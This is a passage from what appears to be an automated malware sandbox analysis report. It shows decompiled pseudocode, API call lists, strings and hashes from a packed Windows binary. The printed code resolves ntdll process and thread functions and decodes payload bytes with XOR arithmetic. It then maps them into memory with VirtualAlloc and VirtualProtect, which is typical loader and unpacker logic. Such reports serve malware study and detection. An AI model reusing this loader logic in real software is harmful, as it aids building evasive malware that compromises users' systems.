													}
													if(__eflags >= 0) {
														_t88 = _v792;
														_t80 =  &(_v792[0]) + _t79;
													} else {
														_t80 = _t79 & 0x0000ffff;
													}
													_t81 = _v784(_v776, _t80);
													__eflags = _t81;
													if(_t81 == 0) {
														goto L27;
													} else {
														 *_t87 = _t81;
														_t101 =  &(_t101[1]);
														_t87 = _t87 + 4;
														__eflags = _t87;
														continue;
													}
													goto L47;
												}
												_t92 =  &(_t92[5]);
												_t84 = 0;
												__eflags =  *_t92;
												if( *_t92 != 0) {
													continue;
												} else {
													goto L21;
												}
												goto L47;
											}
											goto L27;
										}
									}
								}
							}
						}
					} else {
						_t82 = GetModuleHandleW(_t84);
						 *0x41e5a4 = _t82;
						if(_t82 == _t84) {
							goto L27;
						} else {
							L21:
							_t98 =  &_v768;
							E0040CA33(0xe5, _t98);
							_t47 = GetModuleHandleW(_t98);
							 *0x41e5ac = _t47;
							if(_t47 == _t84) {
								goto L27;
							} else {
								_t99 = GetProcAddress;
								 *0x41e5b0 = GetProcAddress(_t47, "NtCreateThread");
								 *0x41e5b4 = GetProcAddress( *0x41e5ac, "NtCreateUserProcess");
								 *0x41e5b8 = GetProcAddress( *0x41e5ac, "NtQueryInformationProcess");
								 *0x41e5bc = GetProcAddress( *0x41e5ac, "RtlUserThreadStart");
								 *0x41e5c0 = GetProcAddress( *0x41e5ac, "LdrLoadDll");
								_t53 = GetProcAddress( *0x41e5ac, "LdrGetDllHandle");
								 *0x41e5c4 = _t53;
								_t110 =  *0x41e5b0 - _t84; // 0x77e599e0
								if(_t110 != 0) {
									L24:
									_t112 =  *0x41e5b8 - _t84; // 0x77e59670
									if(_t112 == 0) {
										goto L27;
									} else {
										_t113 =  *0x41e5c0 - _t84; // 0x77e27840
										if(_t113 == 0 || _t53 == _t84) {
											goto L27;
										} else {
											_t54 = HeapCreate(_t84, 0x80000, _t84); // executed
											 *0x41fe64 = _t54;
											__eflags = _t54 - _t84;
											if(_t54 != _t84) {
												 *0x41e403 = 1;
											} else {
												 *0x41fe64 = GetProcessHeap();
												 *0x41e403 = 0;
											}
											 *0x41f498 = _t84;
											 *0x41e402 = 0;
											InitializeCriticalSection(0x41ec44);
											 *0x41ec5c = _t84; // executed
											__imp__#115(0x202,  &_v748); // executed
											_t57 = E00406233(_a4, _t88, _t92, _t99);
											__eflags = _t57;
											if(_t57 == 0) {
												goto L27;
											} else {
												__eflags = _v792 - _t84;
												if(_v792 != _t84) {
													L34:
													_t58 = E0041271D(_t88, 0xffffffff, 0x41e5a0);
													 *0x41e594 = _t58;
													__eflags = _t58 - _t84;
													if(_t58 == _t84) {
														goto L27;
													} else {
														 *0x41e598 = GetLengthSid( *_t58);
														_t60 =  *0x41e594; // 0x0
														 *0x41e59c = E004124B5( *_t60, _t59);
														_t62 = E004062B2(_t61, _a4);
														__eflags = _t62;
														if(_t62 == 0) {
															goto L27;
														} else {
															 *0x41e800 = GetCurrentProcessId();
															 *0x41e804 = _t84;
															 *0x41ea4e = 0;
															__eflags = _v792 - _t84;
															if(_v792 != _t84) {
																_t65 = 1;
															} else {
																_t65 = E00406314();
															}
															__eflags = _t65;
															if(_t65 == 0) {
																goto L27;
															} else {
																__eflags = _v792 - _t84;
																if(_v792 == _t84) {
																	E00406C9C( &_v756);
																	_t88 = 0x41e9fe;
																	E00415608(0x41e9fe, 0x41e808,  *0x41e59c,  &_v390, _t84);
																}
																_t66 = E00406366(_a4);
																__eflags = _t66;
																if(_t66 == 0) {
																	goto L27;
																} else {
																	__eflags = _a4 & 0x00000002;
																	 *0x41fe74 = _t84;
																	 *0x41ec80 = 0;
																	 *0x41ead8 = 0;
																	 *0x41ebc0 = 0;
																	 *0x41eb58 = 0;
																	 *0x41e408 = 0;
																	 *0x41e3a0 = 0;
																	if(__eflags == 0) {
																		_t68 = 1;
																	} else {
																		_t68 = E0040641D(_t88, _t90, __eflags);
																	}
																	__eflags = _t68;
																	_t38 = _t68 != 0;
																	__eflags = _t38;
																	_t40 = _t68 & 0xffffff00 | _t38;
																}
															}
														}
													}
												} else {
													_t74 = CreateEventW(0x41e5c8, 1, _t84, _t84);
													 *0x41eaa0 =  *0x41eaa0 | 0xffffffff;
													 *0x41ea9c = _t74;
													__eflags = _t74 - _t84;
													if(_t74 == _t84) {
														goto L27;
													} else {
														goto L34;
													}
												}
											}
										}
									}
								} else {
									_t111 =  *0x41e5b4 - _t84; // 0x77e5a120
									if(_t111 == 0) {
										goto L27;
									} else {
										goto L24;
									}
								}
							}
						}
					}
				}
				L47:
				return _t40;
			}

0x00406532
0x00406532
0x00406543
0x00406547
0x0040654b
0x00406557
0x00406557
0x0040654d
0x0040654d
0x0040654f
0x0040654f
0x0040655e
0x00406560
0x00406568
0x004066ed
0x004066ed
0x0040656e
0x00406570
0x0040659a
0x004065a3
0x004065a7
0x004065ac
0x004065af
0x004065b3
0x004065ba
0x004065be
0x00000000
0x004065c0
0x004065c0
0x004065c4
0x00000000
0x004065c6
0x004065c6
0x004065c8
0x004065ca
0x00000000
0x004065cc
0x004065cc
0x004065d0
0x00000000
0x004065d2
0x004065d2
0x004065d4
0x004065d6
0x00000000
0x004065d8
0x004065d8
0x004065e0
0x004065e4
0x004065e8
0x004065ea
0x00000000
0x00000000
0x004065f5
0x004065f9
0x00406629
0x00406629
0x0040662b
0x0040662d
0x00000000
0x00000000
0x004065ff
0x00406608
0x0040660c
0x00406601
0x00406601
0x00406601
0x00406615
0x00406619
0x0040661b
0x00000000
0x00406621
0x00406621
0x00406623
0x00406626
0x00406626
0x00000000
0x00406626
0x00000000
0x0040661b
0x0040662f
0x00406632
0x00406634
0x00406636
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406636
0x00000000
0x004065d8
0x004065d6
0x004065d0
0x004065ca
0x004065c4
0x00406572
0x00406573
0x00406579
0x00406580
0x00000000
0x00406586
0x00406638
0x00406638
0x00406641
0x00406649
0x0040664f
0x00406656
0x00000000
0x0040665c
0x0040665c
0x00406675
0x00406687
0x00406699
0x004066ab
0x004066bd
0x004066c2
0x004066c4
0x004066c9
0x004066cf
0x004066d9
0x004066d9
0x004066df
0x00000000
0x004066e1
0x004066e1
0x004066e7
0x00000000
0x004066f4
0x004066fb
0x00406701
0x00406706
0x00406708
0x0040671e
0x0040670a
0x00406710
0x00406715
0x00406715
0x0040672a
0x00406730
0x00406737
0x00406747
0x0040674d
0x00406756
0x0040675b
0x0040675d
0x00000000
0x0040675f
0x0040675f
0x00406763
0x00406788
0x0040678f
0x00406794
0x00406799
0x0040679b
0x00000000
0x004067a1
0x004067a9
0x004067af
0x004067be
0x004067c3
0x004067c8
0x004067ca
0x00000000
0x004067d0
0x004067d6
0x004067dd
0x004067e3
0x004067e9
0x004067ed
0x004067f6
0x004067ef
0x004067ef
0x004067ef
0x004067f8
0x004067fa
0x00000000
0x00406800
0x00406800
0x00406804
0x0040680a
0x0040681e
0x0040682d
0x0040682d
0x00406835
0x0040683a
0x0040683c
0x00000000
0x00406842
0x00406844
0x00406848
0x0040684e
0x00406854
0x0040685a
0x00406860
0x00406866
0x0040686c
0x00406872
0x0040687b
0x00406874
0x00406874
0x00406874
0x0040687d
0x0040687f
0x0040687f
0x0040687f
0x0040687f
0x0040683c
0x004067fa
0x004067ca
0x00406765
0x0040676e
0x00406774
0x0040677b
0x00406780
0x00406782
0x00000000
0x00000000
0x00000000
0x00000000
0x00406782
0x00406763
0x0040675d
0x004066e7
0x004066d1
0x004066d1
0x004066d7
0x00000000
0x00000000
0x00000000
0x00000000
0x004066d7
0x004066cf
0x00406656
0x00406580
0x00406570
0x00406882
0x00406888

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00406573
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00406649
GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00406668
GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 0040667A
GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 0040668C
GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0040669E
GetProcAddress.KERNEL32(LdrLoadDll), ref: 004066B0
GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 004066C2
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 004066FB
GetProcessHeap.KERNEL32(?,?,00000000), ref: 0040670A
InitializeCriticalSection.KERNEL32(0041EC44,?,?,00000000), ref: 00406737
WSAStartup.WS2_32(00000202,?), ref: 0040674D
CreateEventW.KERNEL32(0041E5C8,00000001,00000000,00000000,?,?,00000000), ref: 0040676E
GetLengthSid.ADVAPI32(00000000,000000FF,0041E5A0,?,?,00000000), ref: 004067A3
GetCurrentProcessId.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 004067D0

Strings

GetProcAddress, xrefs: 0040658B
@xw, xrefs: 004066BD, 004066E1
RtlUserThreadStart, xrefs: 0040668E
LdrGetDllHandle, xrefs: 004066B2
NtCreateUserProcess, xrefs: 0040666A
NtQueryInformationProcess, xrefs: 0040667C
LdrLoadDll, xrefs: 004066A0
NtCreateThread, xrefs: 00406662
LoadLibraryA, xrefs: 00406595

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$CreateHandleHeapModuleProcess$CriticalCurrentEventInitializeLengthSectionStartup
String ID: @xw$GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
API String ID: 3091071419-944592941
Opcode ID: 927afc28ef76845d889ec38140c415208f96e1c7a24ef69a3a5f997d95d714da
Instruction ID: dbef48206a881c020043ad3c6f659b1526b61a3eac7e92badc8f7e4f9cea0ad4
Opcode Fuzzy Hash: 927afc28ef76845d889ec38140c415208f96e1c7a24ef69a3a5f997d95d714da
Instruction Fuzzy Hash: 6691D175901341EFCB10EFA6DC8469A7BA5BF04308B11883FE946B32A1E7398855CF5E

Uniqueness

Uniqueness Score: -1.00%

Function 02457E13, Relevance: 21.7, APIs: 7, Strings: 5, Instructions: 694
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E02457E13(signed int _a4) {
				void* _v36;
				char _v64;
				char _v68;
				long _v72;
				signed int _v76;
				char _v80;
				char _v84;
				char _v88;
				signed int _v92;
				char _v96;
				void* _v103;
				char _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				void* _v123;
				char _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				short _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				char _v204;
				signed int _v208;
				signed int _v212;
				char _v216;
				signed int _v220;
				void* _v224;
				char _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				char _v244;
				signed int _v248;
				signed int* _v252;
				signed int _v256;
				signed int _v260;
				void* _v264;
				signed int _v268;
				intOrPtr _v272;
				signed int _v276;
				intOrPtr _v280;
				signed int _v284;
				intOrPtr _v288;
				signed int _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t384;
				char _t385;
				void* _t396;
				void* _t415;
				void* _t420;
				signed int _t429;
				intOrPtr _t449;
				void* _t465;
				void* _t466;
				signed int _t499;
				void* _t525;
				signed int _t574;
				char _t591;
				char _t592;
				signed int _t614;
				void* _t630;
				signed int _t631;
				signed int _t682;
				void* _t700;
				signed int _t719;
				intOrPtr _t730;
				signed int _t752;
				long _t753;
				signed int _t755;
				void* _t756;
				void* _t770;
				signed int _t789;
				void* _t791;

				_t791 = (_t789 & 0xfffffff8) - 0x104;
				_v256 = 0xc6f8e435;
				_v248 = 0xc6f8e434;
				_v260 = _a4;
				_t574 = 0x2a823c2b;
				_v252 = (_v256 ^ 0x2a823c2b) + 0x138527e2;
				_v244 = (_v256 ^ 0x2a823c2b) + 0x138527e2;
				_v232 = (_v256 ^ 0x2a823c2b) + 0x138527e2;
				_v88 = (_v256 ^ 0x2a823c2b) + 0x138527e2;
				_v208 = 0xc6f96435;
				_v232 = 0xc6f8d435;
				_v144 = 0xc6f8e409;
				_t591 = 0x26;
				_v228 = _t591;
				_v228 = _t591;
				_t592 = 0x66;
				_v228 = _t592;
				_v228 = _t592;
				_v228 = 0x4e;
				_v228 = 0x44;
				_v228 = (_v256 ^ 0x2a823c2b) + 0x138527e2;
				_v228 = (_v256 ^ 0x2a823c2b) + 0x138527e2;
				_v216 = 0x258;
				do {
					_v220 = 0x36;
					do {
						_v224 = 0x7a;
						do {
							E024588DA( &_v68);
							_t31 =  &_v224;
							 *_t31 = _v224 - 1;
						} while ( *_t31 != 0);
						_t33 =  &_v220;
						 *_t33 = _v220 - 1;
					} while ( *_t33 != 0);
					_t35 =  &_v216;
					 *_t35 = _v216 - 1;
				} while ( *_t35 != 0);
				_v220 = 0x400e;
				_t770 = 0x138527e2;
				_v216 = (_v256 ^ _t574) + 0x138527e2;
				_v140 = _v140 & 0x00000000;
				_v224 = (_v256 ^ _t574) + 0x138527e2;
				_t384 =  *[fs:0x18];
				_v140 = _t384;
				_t385 =  *((intOrPtr*)(_t384 + 0x30));
				_v80 = _t385;
				_v84 =  *((intOrPtr*)(_t385 + 0xc));
				 *((intOrPtr*)(_v260 + 0x1a0)) =  &_v140;
				 *((intOrPtr*)(_v260 + 0x1a4)) =  &_v80;
				 *((intOrPtr*)(_v260 + 0x1a8)) =  &_v84;
				if((_v260 ^ _t574) + 0x138527e2 == E0245A87F( &_v84, _v260)) {
					L27:
					if((_v256 ^ _t574) + _t770 == _v252 || (_v256 ^ _t574) + _t770 == _v244) {
						L61:
						_t396 = (_v256 ^ _t574) + _t770;
						if(_t396 != _v252) {
							_t396 =  *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x1d4)) + 0x18))(_v252, (_v256 ^ _t574) + _t770, (_v208 ^ _t574) + _t770);
						}
						goto L63;
					} else {
						_t752 = (_v256 ^ _t574) + _t770;
						while(_t752 < _v244) {
							_v228 = _v252 + _t752;
							_t614 = 0x2c;
							_t729 = _t752 % _t614;
							 *_v228 =  *_v228 + 0xcb;
							_t752 = _t752 + (_v248 ^ _t574) + 0x138527e2;
						}
						_t753 = E0245B598(_v244, _v252);
						_t415 = VirtualAlloc((_v256 ^ _t574) + _t770, _t753, (_v232 ^ _t574) + _t770, (_v144 ^ _t574) + _t770);
						_v232 = _t415;
						if((_v256 ^ _t574) + _t770 == _t415) {
							L46:
							_t630 = 0;
							if(_v244 == 0) {
								L48:
								_v224 = _v252;
								_t631 = _v256;
								_t420 = (_v248 ^ _t574) + _t770;
								_v204 = 0x2d161e16;
								_v200 = 0x23162b16;
								while(_t631 != 0xc6f8e40d) {
									_t730 = _v224;
									_t755 = _t631 ^ _t574;
									_t729 =  *((char*)(_t755 + _t730 + 0x138527e2));
									if( *((char*)(_t755 + _t730 + 0x138527e2)) != (( *(_t791 + _t755 + 0x1385282a) ^ 0x0000003f) + 0x0000002f & 0x000000ff)) {
										_t420 = (_v256 ^ _t574) + _t770;
										L54:
										if((_v256 ^ _t574) + _t770 == _t420) {
											L60:
											_t429 = E02459A29(_v252, _v244,  *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x1c0)))),  *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x1c4)))),  &_v88,  *((intOrPtr*)(_v260 + 0x1cc)), _v260); // executed
											_v260 = _t429;
											goto L61;
										}
										_v248 = 0xc6f8e435;
										_v232 = 0xc6f92aa6;
										_v212 = 0xc6f8d435;
										_v236 = 0xc6f8e409;
										_v220 =  *((intOrPtr*)(_v224 + 8));
										_t756 = VirtualAlloc((_v248 ^ _t574) + _t770, (_v232 ^ _t574) + _t770, (_v212 ^ _t574) + _t770, (_v236 ^ _t574) + _t770);
										_t396 = VirtualAlloc((_v248 ^ _t574) + _t770, _v220, (_v212 ^ _t574) + _t770, (_v236 ^ _t574) + _t770);
										_v236 = _t396;
										if((_v248 ^ _t574) + _t770 == _t756 || (_v248 ^ _t574) + _t770 == _t396) {
											L63:
											return _t396;
										} else {
											_v232 = 0xc6f8e40a;
											_v144 = 0xc6f8e40b;
											 *_t756 = (_v232 ^ 0x0000002b) - 0x1e;
											 *((char*)(_t756 + 1)) = (_v248 ^ 0x0000002b) - 0x1e;
											 *((char*)(_t756 + 2)) = (_v144 ^ 0x0000002b) - 0x1e;
											_v92 = _v92 & 0x00000000;
											_v76 = _v76 & 0x00000000;
											_push( &_v76);
											_push(_v220);
											_push(_t396);
											_v260 = E02458B27(_t729, _t756,  &(_v252[4]),  *((intOrPtr*)(_v224 + 0xc)),  &_v92);
											VirtualFree(_t756, (_v276 ^ _t574) + _t770, (_v236 ^ _t574) + _t770);
											_t449 =  *((intOrPtr*)(_v288 + 0x1d4));
											_t682 = _v236;
											if((_v260 + 0xec7ad81e ^ _t574) != 0xc6f8e435) {
												 *((intOrPtr*)(_t449 + 0x18))(_v248, (_v260 ^ _t574) + _t770, (_t682 ^ _t574) + _t770);
											} else {
												VirtualFree(_v264, (_v260 ^ _t574) + _t770, (_t682 ^ _t574) + _t770);
												_v264 = _v248;
												_v256 = _v232;
											}
											goto L60;
										}
									}
									_t631 = (_v248 ^ _t574) + _t755 + 0x138527e2 ^ _t574;
								}
								goto L54;
							} else {
								goto L47;
							}
							do {
								L47:
								_t729 = _v252;
								 *(_v252 + _t630) = ( *(_v252 + _t630) ^ 0x0000003f) + 0x2f;
								_t630 = _t630 + 1;
							} while (_t630 < _v244);
							goto L48;
						}
						E0245B440(_v252, _v244, _t415, _t753);
						VirtualFree(_v264, (_v268 ^ 0x2a823c2b) + 0x138527e2, (_v220 ^ 0x2a823c2b) + 0x138527e2);
						_v264 = _v244;
						_v256 = _t753;
						_t729 = 0;
						if(_v256 == 0) {
							L45:
							_t770 = 0x138527e2;
							_t574 = 0x2a823c2b;
							goto L46;
						} else {
							goto L34;
						}
						do {
							L34:
							_v240 = _v240 & 0x00000000;
							while(1) {
								_t465 = 0x10;
								if(_v244 - _v240 - _t729 <= _t465) {
									_t465 = _v244 - _v240 - _t729;
								}
								if(_v240 >= _t465) {
									break;
								}
								_t729 = (_t729 >> 0x00000004 & 0x00000003) * (_t729 + _v240 & 0x0000001f) * (_t729 + _v240 & 0x00000003) >> 0x20;
								 *((intOrPtr*)(_v252 + _v240 + _t729)) =  *((intOrPtr*)(_v252 + _v240 + _t729)) + 0xfe;
								_v240 = _v240 + 1;
							}
							_t700 = 0;
							while(1) {
								_t466 = 8;
								if(_v244 - _t700 - _t729 <= _t466) {
									_t466 = _v244 - _t700 - _t729;
								}
								if(_t700 >= _t466) {
									goto L44;
								}
								 *((intOrPtr*)(_v252 + _t700 + _t729)) =  *((intOrPtr*)(_v252 + _t700 + _t729)) - _t700;
								_t700 = _t700 + 1;
							}
							L44:
							_t729 = _t729 + 0x40;
						} while (_t729 < _v244);
						goto L45;
					}
				}
				VirtualProtect( *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x18c)))) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x194)))) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x194)))) + 0x3c)) + 0x88)),  *( *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x194)))) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x194)))) + 0x3c)) + 0x8c), 4,  &_v72);
				_v136 = 0x62b7b25;
				_v132 = 0x7f227c0d;
				_v128 = 0x2d7c0977;
				_v124 = 0xee;
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_v116 = 0x62b7b25;
				_v112 = 0x7f227c0d;
				_v108 = 0x177c0977;
				_v104 = 0xee;
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t729 =  *(_v260 + 0x1b8);
				_v196 = 0x7c7a7b02;
				_v192 = 0x57e010b;
				_v188 = 0xee2d;
				_v184 = 0x62b7b25;
				_v180 = 0x22d7c0d;
				_v176 = 0x200d067e;
				_v172 = 0x7c090179;
				_v168 = 0xee2d0b05;
				_v164 = 0x62b7b25;
				_v160 = 0x22d7c0d;
				_v156 = 0x200d067e;
				_v152 = 0x7c090179;
				_v148 = 0xee170b05;
				if(E0245A54F( *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x1a8)))), E0245A8AE( *(_v260 + 0x1b8), _v260), _v260) == 0) {
					_v236 =  *((intOrPtr*)(_v260 + 0x1d4)) + 4;
					_t729 =  *(_v260 + 0x1b8);
					_push(E0245A8AE( *(_v260 + 0x1b8), _v260));
					if( *_v236() == 0) {
						_v240 =  *((intOrPtr*)(_v264 + 0x1d4)) + 0x10;
						_t729 =  *(_v264 + 0x1b8);
						 *_v240(E0245A8AE( *(_v264 + 0x1b8), _v264));
					}
				}
				if((_v256 ^ _t574) + _t770 == _v220 || _v216 > 0xec7ad81e - (_v248 ^ _t574) + _v220) {
					L24:
					if(_v216 != _v224) {
						 *_v252 =  *_v252 ^ (_v248 ^ _t574) + _t770;
					} else {
						_t499 = E0245B3D9( &_v244, _v260); // executed
						_v260 = _t499;
					}
					goto L27;
				} else {
					do {
						_v236 = 0;
						 *((intOrPtr*)( *((intOrPtr*)(_v272 + 0x19c)))) = E0245A54F( *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x1a8)))), E0245A8AE( *((intOrPtr*)(_v260 + 0x1b4)), _v260), _v260);
						_v116 =  *((intOrPtr*)( *((intOrPtr*)(_v272 + 0x1d4)) + 8))( *((intOrPtr*)( *((intOrPtr*)(_v272 + 0x19c)))), E0245A8E4(0,  &_v176, _v272));
						 *((intOrPtr*)( *((intOrPtr*)(_v280 + 0x1d4)) + 8))( *((intOrPtr*)( *((intOrPtr*)(_v280 + 0x19c)))), E0245A8E4(0,  &_v204, _v280));
						_t525 =  *((intOrPtr*)( *((intOrPtr*)(_v288 + 0x1d4)) + 8))( *((intOrPtr*)( *((intOrPtr*)(_v288 + 0x19c)))), E0245A8E4(0,  &_v164, _v288));
						_v276 = _v276 & 0x00000000;
						_v264 = _t525;
						do {
							_push((_v264 & 0x00000007) + 0x31);
							if(_v120() == 0) {
								L16:
								_v240 = _v240 & 0x00000000;
								goto L17;
							}
							_t719 = 0x19;
							_push(_v268 % _t719 + 0x00000041 & 0x000000ff); // executed
							if(_v256() != 0) {
								goto L16;
							}
							_v252 =  *((intOrPtr*)( *((intOrPtr*)(_v292 + 0x1d4)) + 8))( *((intOrPtr*)( *((intOrPtr*)(_v292 + 0x198)))), E0245A8E4(0,  &_v228, _v292));
							L17:
							_v268 = _v268 + 1;
						} while (_v268 < 0x10);
						_push(E0245A8E4((_v276 ^ _t574) + 0x138527e2,  &_v96, _v288));
						_t729 =  &_v64;
						_push(E0245A8E4((_v284 ^ _t574) + 0x138527e2,  &_v64, _v288)); // executed
						if((_v292 ^ _t574) + 0x138527e2 == _v240()) {
							_v272 = 1;
						}
						_v252 = (_v284 ^ _t574) + _v252 + 0x138527e2;
						if(_v272 != 0) {
							_v260 = (_v284 ^ _t574) + _v260 + 0x138527e2;
						}
					} while (_v252 <= 0xec7ad81e - (_v284 ^ _t574) + _v256);
					_t770 = 0x138527e2;
					goto L24;
				}
			}

0x02457e19
0x02457e22
0x02457e2a
0x02457e35
0x02457e3d
0x02457e4b
0x02457e57
0x02457e63
0x02457e6f
0x02457e76
0x02457e7e
0x02457e86
0x02457e93
0x02457e94
0x02457e98
0x02457e9e
0x02457e9f
0x02457ea3
0x02457ea7
0x02457eaf
0x02457ebf
0x02457ecb
0x02457ecf
0x02457ed7
0x02457ed7
0x02457edf
0x02457edf
0x02457ee7
0x02457ef5
0x02457efa
0x02457efa
0x02457efa
0x02457f00
0x02457f00
0x02457f00
0x02457f06
0x02457f06
0x02457f06
0x02457f0c
0x02457f1a
0x02457f21
0x02457f29
0x02457f35
0x02457f39
0x02457f3f
0x02457f46
0x02457f49
0x02457f53
0x02457f65
0x02457f76
0x02457f8b
0x02457fa0
0x0245838a
0x02458398
0x024587b0
0x024587ba
0x024587be
0x024587e0
0x024587e0
0x00000000
0x024583b2
0x024583b8
0x024583e6
0x024583c2
0x024583cc
0x024583cd
0x024583d7
0x024583df
0x024583df
0x024583ff
0x0245842a
0x02458435
0x0245843b
0x0245852d
0x02458531
0x02458535
0x02458552
0x02458556
0x0245855e
0x02458564
0x02458566
0x0245856e
0x024585ab
0x02458578
0x0245857e
0x02458587
0x0245859a
0x024585bb
0x024585bd
0x024585c7
0x02458771
0x024587a7
0x024587ac
0x00000000
0x024587ac
0x024585d4
0x024585dc
0x024585e4
0x024585ec
0x024585f4
0x02458629
0x02458654
0x0245865f
0x02458665
0x024587e3
0x024587e9
0x0245867b
0x0245867b
0x02458683
0x02458698
0x024586a4
0x024586b4
0x024586b7
0x024586bf
0x024586ce
0x024586cf
0x024586d3
0x024586f1
0x02458712
0x02458729
0x0245872f
0x02458733
0x0245876e
0x02458735
0x02458747
0x0245874e
0x02458756
0x02458756
0x00000000
0x02458733
0x02458665
0x024585a9
0x024585a9
0x00000000
0x00000000
0x00000000
0x00000000
0x02458537
0x02458537
0x0245853e
0x02458546
0x0245854d
0x0245854e
0x00000000
0x02458537
0x0245844b
0x0245847a
0x02458481
0x02458485
0x0245848d
0x02458491
0x02458523
0x02458523
0x02458528
0x00000000
0x00000000
0x00000000
0x00000000
0x02458497
0x02458497
0x02458497
0x0245849c
0x024584a8
0x024584ab
0x024584b5
0x024584b5
0x024584bb
0x00000000
0x00000000
0x024584dc
0x024584e2
0x024584e5
0x024584e5
0x024584eb
0x024584ed
0x024584f7
0x024584fa
0x02458502
0x02458502
0x02458506
0x00000000
0x00000000
0x0245850e
0x02458511
0x02458511
0x02458514
0x02458518
0x0245851b
0x00000000
0x02458497
0x02458398
0x02457fee
0x02457ff7
0x02458002
0x0245800d
0x02458018
0x02458027
0x02458028
0x0245802a
0x0245802d
0x02458038
0x02458043
0x0245804e
0x0245805d
0x0245805e
0x02458060
0x02458069
0x0245806f
0x02458077
0x0245807f
0x02458086
0x0245808e
0x02458096
0x0245809e
0x024580a6
0x024580ae
0x024580b6
0x024580be
0x024580c6
0x024580d1
0x024580f5
0x02458108
0x02458110
0x0245811b
0x02458124
0x02458137
0x0245813f
0x0245814f
0x0245814f
0x02458124
0x0245815f
0x0245835c
0x02458366
0x02458388
0x02458368
0x02458371
0x02458376
0x02458376
0x00000000
0x02458182
0x02458182
0x02458182
0x024581bd
0x024581e8
0x02458215
0x02458241
0x02458244
0x02458249
0x0245824d
0x02458257
0x02458261
0x024582ac
0x024582ac
0x00000000
0x024582ac
0x0245826b
0x02458274
0x0245827b
0x00000000
0x00000000
0x024582a6
0x024582b1
0x024582b1
0x024582b5
0x024582d9
0x024582e6
0x024582f2
0x02458301
0x02458303
0x02458303
0x0245831c
0x02458326
0x02458339
0x02458339
0x02458352
0x0245835a
0x00000000
0x0245835a

APIs

VirtualProtect.KERNELBASE(?,?,00000004,?,?), ref: 02457FEE
VirtualAlloc.KERNELBASE(C6F8E434,00000000,00000044,C6F8E409,?), ref: 0245842A
VirtualFree.KERNELBASE(?,?,C6F96435,?,00000000,00000000), ref: 0245847A
VirtualAlloc.KERNELBASE(C6F8E409,00000000,C6F96435,C6F8E409), ref: 02458626
VirtualAlloc.KERNELBASE(?,C6F8D435,C6F96435,C6F8E409), ref: 02458654
VirtualFree.KERNELBASE(00000000,?,C6F96435,00000000,C6F8E3FA,?,?,00000000,00000000,00000000), ref: 02458712
VirtualFree.KERNELBASE(?,?,C6F96435), ref: 02458747

Part of subcall function 02459A29: VirtualProtect.KERNELBASE(C6F90E40,?,C6F8E475,?,C6F8E435,138527E2,2A823C2B), ref: 02459B5F

Strings

-, xrefs: 0245807F
w|-, xrefs: 0245800D
z, xrefs: 02457EDF
D, xrefs: 02457EAF
6, xrefs: 02457ED7

Memory Dump Source

Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp Download File

Similarity

API ID: Virtual$AllocFree$Protect
String ID: -$6$D$w|-$z
API String ID: 1189896503-3252895305
Opcode ID: 83e5532f2af3301e27c59f772f91f7027ff3e2d4392f4593e375364c6920ae0a
Instruction ID: 43cf0a844ca9eea4ead5bb2f73a3a2c4e9d574981e0869c2df5db53a3cfee520
Opcode Fuzzy Hash: 83e5532f2af3301e27c59f772f91f7027ff3e2d4392f4593e375364c6920ae0a
Instruction Fuzzy Hash: 725206752083519FC714CF28C894AABBBE1FF88714F45496EF88A9B351DB34E849CB52

Uniqueness

Uniqueness Score: -1.00%

Function 024590B3, Relevance: 14.0, Strings: 11, Instructions: 268
COMMONCrypto

Download Yara Rule

C-Code - Quality: 61%

			E024590B3(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20, signed int _a24) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
